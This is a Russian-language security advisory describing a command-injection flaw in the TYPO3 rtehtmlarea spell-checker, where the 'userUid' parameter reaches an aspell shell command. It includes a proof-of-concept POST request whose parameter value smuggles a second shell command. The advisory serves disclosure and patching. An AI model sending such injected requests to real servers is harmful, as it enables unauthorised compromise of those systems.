Security Lab

Выполнение произвольных команд в TYPO3

Дата публикации:26.12.2006
Дата изменения:15.11.2008
Всего просмотров:2428
Опасность:
Высокая
Наличие исправления: Да
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации: Удаленная
Воздействие: Компрометация системы
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты: TYPO3 4.x
Уязвимые версии:
TYPO3 4.0.3 и более ранние версии.
rtehtmlarea (расширение к TYPO3) 1.4.2 и более ранние версии.

Описание:
Уязвимость позволяет удаленному пользователю скомпрометировать целевую систему.

Уязвимость существует из-за недостаточной обработки входных данных в параметре "userUid" в сценарии sysext/rtehtmlarea/htmlarea/plugins/SpellChecker/spell-check-logic.php перед использованием их в команде "aspell". Удаленный пользователь может выполнить произвольные команды на системе. Для успешной эксплуатации уязвимости опция "safe_mode" должна быть отключена в конфигурационном файла PHP. Пример:

--- post request ---

POST /typo3/sysext/rtehtmlarea/htmlarea/plugins/SpellChecker/spell-

check-logic.php?id=1 HTTP/1.1

Host: www.typo3host.abc

User-Agent: none

Content-Type: application/x-www-form-urlencoded

Content-Length: 111

psell_mode=fast&to_p_dict=1&cmd=learn&userUid=test;+echo+'shell'+>+

/tmp/shell.txt+%23&enablePersonalDicts=true

--- /post request ---

URL производителя: typo3.org

Решение: Установите последнюю версию (4.0.4) с сайта производителя.

Ссылки: Remote Command Execution in TYPO3